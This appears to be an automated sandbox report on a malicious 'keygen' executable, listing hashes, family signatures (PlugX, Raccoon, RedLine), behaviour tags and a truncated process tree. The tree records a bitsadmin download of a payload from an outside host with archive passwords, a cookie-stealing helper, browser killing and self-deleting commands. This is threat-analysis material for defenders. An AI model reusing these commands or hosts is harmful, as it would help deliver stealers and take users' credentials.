Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1801s
  • max time network
    1737s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    04-05-2021 10:11

General

  • Target

    keygen-step-4d.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Signatures

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 48 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 52 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 16 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 34 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 19 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 9 IoCs
  • Runs ping.exe 1 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 8 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2740
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2724
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2604
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2544
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2492
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
          1⤵
            PID:1908
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s SENS
            1⤵
              PID:1372
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
              1⤵
                PID:1340
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1200
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1084
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:340
                    • C:\Users\Admin\AppData\Roaming\adjsatt
                      C:\Users\Admin\AppData\Roaming\adjsatt
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:4216
                      • C:\Users\Admin\AppData\Roaming\adjsatt
                        C:\Users\Admin\AppData\Roaming\adjsatt
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:7080
                    • C:\Users\Admin\AppData\Roaming\adjsatt
                      C:\Users\Admin\AppData\Roaming\adjsatt
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:6180
                      • C:\Users\Admin\AppData\Roaming\adjsatt
                        C:\Users\Admin\AppData\Roaming\adjsatt
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:6784
                    • C:\Users\Admin\AppData\Roaming\adjsatt
                      C:\Users\Admin\AppData\Roaming\adjsatt
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:5036
                      • C:\Users\Admin\AppData\Roaming\adjsatt
                        C:\Users\Admin\AppData\Roaming\adjsatt
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        PID:6768
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                    1⤵
                      PID:996
                    • C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe
                      "C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe"
                      1⤵
                      • Checks computer location settings
                      • Suspicious use of WriteProcessMemory
                      PID:3896
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                        2⤵
                        • Executes dropped EXE
                        • Drops file in Program Files directory
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:2872
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                          3⤵
                          • Loads dropped DLL
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:2680
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3272
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:2308
                        • C:\Users\Admin\AppData\Local\Temp\is-QG3HL.tmp\Install.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-QG3HL.tmp\Install.tmp" /SL5="$6018E,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:2688
                          • C:\Users\Admin\AppData\Local\Temp\is-6FC4M.tmp\Ultra.exe
                            "C:\Users\Admin\AppData\Local\Temp\is-6FC4M.tmp\Ultra.exe" /S /UID=burnerch1
                            4⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Drops file in Program Files directory
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:2360
                            • C:\Program Files\Windows Photo Viewer\RAAVZVNBYC\ultramediaburner.exe
                              "C:\Program Files\Windows Photo Viewer\RAAVZVNBYC\ultramediaburner.exe" /VERYSILENT
                              5⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:3972
                              • C:\Users\Admin\AppData\Local\Temp\is-PB6AD.tmp\ultramediaburner.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-PB6AD.tmp\ultramediaburner.tmp" /SL5="$701EC,281924,62464,C:\Program Files\Windows Photo Viewer\RAAVZVNBYC\ultramediaburner.exe" /VERYSILENT
                                6⤵
                                • Executes dropped EXE
                                • Drops file in Program Files directory
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of WriteProcessMemory
                                PID:3708
                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                  7⤵
                                  • Executes dropped EXE
                                  PID:4056
                            • C:\Users\Admin\AppData\Local\Temp\a5-b38ae-8e3-196af-ca45672c17da1\Relimaekuzhu.exe
                              "C:\Users\Admin\AppData\Local\Temp\a5-b38ae-8e3-196af-ca45672c17da1\Relimaekuzhu.exe"
                              5⤵
                              • Executes dropped EXE
                              • Checks computer location settings
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3164
                            • C:\Users\Admin\AppData\Local\Temp\1b-d5f74-3a8-f98a2-1e1a7fbc6a975\Vusawunaera.exe
                              "C:\Users\Admin\AppData\Local\Temp\1b-d5f74-3a8-f98a2-1e1a7fbc6a975\Vusawunaera.exe"
                              5⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:4124
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3cbtndnu.5qs\sskiper.exe /s & exit
                                6⤵
                                • Suspicious use of WriteProcessMemory
                                PID:2588
                                • C:\Users\Admin\AppData\Local\Temp\3cbtndnu.5qs\sskiper.exe
                                  C:\Users\Admin\AppData\Local\Temp\3cbtndnu.5qs\sskiper.exe /s
                                  7⤵
                                  • Executes dropped EXE
                                  PID:2668
                                  • C:\Users\Admin\AppData\Local\Temp\1404168539.exe
                                    C:\Users\Admin\AppData\Local\Temp\1404168539.exe
                                    8⤵
                                    • Executes dropped EXE
                                    PID:4976
                                  • C:\Users\Admin\AppData\Local\Temp\2072696757.exe
                                    C:\Users\Admin\AppData\Local\Temp\2072696757.exe
                                    8⤵
                                    • Executes dropped EXE
                                    PID:4668
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\3cbtndnu.5qs\sskiper.exe & exit
                                    8⤵
                                      PID:6924
                                      • C:\Windows\SysWOW64\PING.EXE
                                        ping 0
                                        9⤵
                                        • Runs ping.exe
                                        PID:6228
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\irw0aai0.hws\KiffMainE1.exe & exit
                                  6⤵
                                    PID:4708
                                    • C:\Users\Admin\AppData\Local\Temp\irw0aai0.hws\KiffMainE1.exe
                                      C:\Users\Admin\AppData\Local\Temp\irw0aai0.hws\KiffMainE1.exe
                                      7⤵
                                      • Executes dropped EXE
                                      PID:4116
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bcqrkss3.vu3\001.exe & exit
                                    6⤵
                                      PID:4972
                                      • C:\Users\Admin\AppData\Local\Temp\bcqrkss3.vu3\001.exe
                                        C:\Users\Admin\AppData\Local\Temp\bcqrkss3.vu3\001.exe
                                        7⤵
                                        • Executes dropped EXE
                                        PID:4148
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vxvlm4ys.c1y\installer.exe /qn CAMPAIGN="654" & exit
                                      6⤵
                                        PID:4308
                                        • C:\Users\Admin\AppData\Local\Temp\vxvlm4ys.c1y\installer.exe
                                          C:\Users\Admin\AppData\Local\Temp\vxvlm4ys.c1y\installer.exe /qn CAMPAIGN="654"
                                          7⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Enumerates connected drives
                                          • Modifies system certificate store
                                          • Suspicious use of FindShellTrayWindow
                                          PID:5052
                                          • C:\Windows\SysWOW64\msiexec.exe
                                            "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\vxvlm4ys.c1y\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\vxvlm4ys.c1y\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1619863607 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                            8⤵
                                              PID:6112
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\opfbyj2a.df1\gpooe.exe & exit
                                          6⤵
                                            PID:2280
                                            • C:\Users\Admin\AppData\Local\Temp\opfbyj2a.df1\gpooe.exe
                                              C:\Users\Admin\AppData\Local\Temp\opfbyj2a.df1\gpooe.exe
                                              7⤵
                                              • Executes dropped EXE
                                              • Adds Run key to start application
                                              PID:5300
                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                8⤵
                                                • Executes dropped EXE
                                                PID:5556
                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                8⤵
                                                • Executes dropped EXE
                                                PID:5672
                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                8⤵
                                                • Executes dropped EXE
                                                PID:2268
                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                8⤵
                                                • Executes dropped EXE
                                                PID:748
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\raf1dcpo.23k\google-game.exe & exit
                                            6⤵
                                              PID:5256
                                              • C:\Users\Admin\AppData\Local\Temp\raf1dcpo.23k\google-game.exe
                                                C:\Users\Admin\AppData\Local\Temp\raf1dcpo.23k\google-game.exe
                                                7⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetWindowsHookEx
                                                PID:4904
                                                • C:\Windows\SysWOW64\rundll32.exe
                                                  "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                                  8⤵
                                                  • Loads dropped DLL
                                                  PID:4924
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gqfzfzbg.cby\y1.exe & exit
                                              6⤵
                                                PID:1480
                                                • C:\Users\Admin\AppData\Local\Temp\gqfzfzbg.cby\y1.exe
                                                  C:\Users\Admin\AppData\Local\Temp\gqfzfzbg.cby\y1.exe
                                                  7⤵
                                                    PID:4440
                                                    • C:\Users\Admin\AppData\Local\Temp\xiNKMaeKBr.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\xiNKMaeKBr.exe"
                                                      8⤵
                                                      • Executes dropped EXE
                                                      • Modifies system certificate store
                                                      PID:7060
                                                      • C:\Users\Admin\AppData\Roaming\1620122939998.exe
                                                        "C:\Users\Admin\AppData\Roaming\1620122939998.exe" /sjson "C:\Users\Admin\AppData\Roaming\1620122939998.txt"
                                                        9⤵
                                                        • Executes dropped EXE
                                                        PID:7052
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\xiNKMaeKBr.exe"
                                                        9⤵
                                                          PID:748
                                                          • C:\Windows\SysWOW64\PING.EXE
                                                            ping 127.0.0.1 -n 3
                                                            10⤵
                                                            • Runs ping.exe
                                                            PID:6040
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\gqfzfzbg.cby\y1.exe"
                                                        8⤵
                                                          PID:2176
                                                          • C:\Windows\SysWOW64\timeout.exe
                                                            timeout /T 10 /NOBREAK
                                                            9⤵
                                                            • Delays execution with timeout.exe
                                                            PID:4648
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gyy5yboh.hqi\askinstall39.exe & exit
                                                      6⤵
                                                        PID:6060
                                                        • C:\Users\Admin\AppData\Local\Temp\gyy5yboh.hqi\askinstall39.exe
                                                          C:\Users\Admin\AppData\Local\Temp\gyy5yboh.hqi\askinstall39.exe
                                                          7⤵
                                                          • Executes dropped EXE
                                                          PID:5744
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd.exe /c taskkill /f /im chrome.exe
                                                            8⤵
                                                              PID:6220
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im chrome.exe
                                                                9⤵
                                                                • Kills process with taskkill
                                                                PID:4652
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jivbyl4p.dj2\setup.exe & exit
                                                          6⤵
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:4368
                                                          • C:\Users\Admin\AppData\Local\Temp\jivbyl4p.dj2\setup.exe
                                                            C:\Users\Admin\AppData\Local\Temp\jivbyl4p.dj2\setup.exe
                                                            7⤵
                                                              PID:5860
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\jivbyl4p.dj2\setup.exe"
                                                                8⤵
                                                                  PID:6240
                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                    ping 1.1.1.1 -n 1 -w 3000
                                                                    9⤵
                                                                    • Runs ping.exe
                                                                    PID:6420
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uz3jfkj4.h10\SunLabsPlayer.exe /S & exit
                                                              6⤵
                                                                PID:5688
                                                                • C:\Users\Admin\AppData\Local\Temp\uz3jfkj4.h10\SunLabsPlayer.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\uz3jfkj4.h10\SunLabsPlayer.exe /S
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • Drops file in Program Files directory
                                                                  PID:4708
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmCB08.tmp\tempfile.ps1"
                                                                    8⤵
                                                                      PID:6828
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmCB08.tmp\tempfile.ps1"
                                                                      8⤵
                                                                        PID:5704
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmCB08.tmp\tempfile.ps1"
                                                                        8⤵
                                                                          PID:4524
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmCB08.tmp\tempfile.ps1"
                                                                          8⤵
                                                                            PID:304
                                                                            • C:\Windows\System32\Conhost.exe
                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              9⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              PID:4440
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmCB08.tmp\tempfile.ps1"
                                                                            8⤵
                                                                              PID:3020
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmCB08.tmp\tempfile.ps1"
                                                                              8⤵
                                                                                PID:6500
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmCB08.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                • Checks for any installed AV software in registry
                                                                                PID:5424
                                                                              • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                                8⤵
                                                                                • Download via BitsAdmin
                                                                                PID:208
                                                                              • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                "C:\Program Files (x86)\lighteningplayer\data_load.exe" -p3oiASrVz4Fp3yrG -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                8⤵
                                                                                • Executes dropped EXE
                                                                                PID:6904
                                                                              • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pQ0lWHBfyfecMuF9 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                8⤵
                                                                                • Executes dropped EXE
                                                                                PID:5132
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmCB08.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                  PID:6256
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmCB08.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                    PID:6540
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmCB08.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                      PID:4012
                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        9⤵
                                                                                          PID:6924
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmCB08.tmp\tempfile.ps1"
                                                                                        8⤵
                                                                                          PID:3756
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmCB08.tmp\tempfile.ps1"
                                                                                          8⤵
                                                                                            PID:4404
                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              9⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:5860
                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                            C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ZEhWHVROM\ZEhWHVROM.dll" ZEhWHVROM
                                                                                            8⤵
                                                                                            • Loads dropped DLL
                                                                                            PID:4660
                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                              C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ZEhWHVROM\ZEhWHVROM.dll" ZEhWHVROM
                                                                                              9⤵
                                                                                              • Loads dropped DLL
                                                                                              • Drops file in System32 directory
                                                                                              PID:6588
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmCB08.tmp\tempfile.ps1"
                                                                                            8⤵
                                                                                              PID:6064
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmCB08.tmp\tempfile.ps1"
                                                                                              8⤵
                                                                                              • Drops file in Program Files directory
                                                                                              PID:4168
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmCB08.tmp\tempfile.ps1"
                                                                                              8⤵
                                                                                                PID:6528
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmCB08.tmp\tempfile.ps1"
                                                                                                8⤵
                                                                                                  PID:7004
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmCB08.tmp\tempfile.ps1"
                                                                                                  8⤵
                                                                                                    PID:6400
                                                                                                  • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                    "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                    8⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Loads dropped DLL
                                                                                                    PID:2156
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\f3veyuv0.2gf\005.exe & exit
                                                                                                6⤵
                                                                                                  PID:4652
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\f3veyuv0.2gf\005.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\f3veyuv0.2gf\005.exe
                                                                                                    7⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:6168
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3rh52xlu.xnj\ifhwwyy.exe & exit
                                                                                                  6⤵
                                                                                                    PID:2248
                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      7⤵
                                                                                                        PID:4948
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\3rh52xlu.xnj\ifhwwyy.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\3rh52xlu.xnj\ifhwwyy.exe
                                                                                                        7⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:6424
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                          8⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:6612
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                          8⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:3976
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
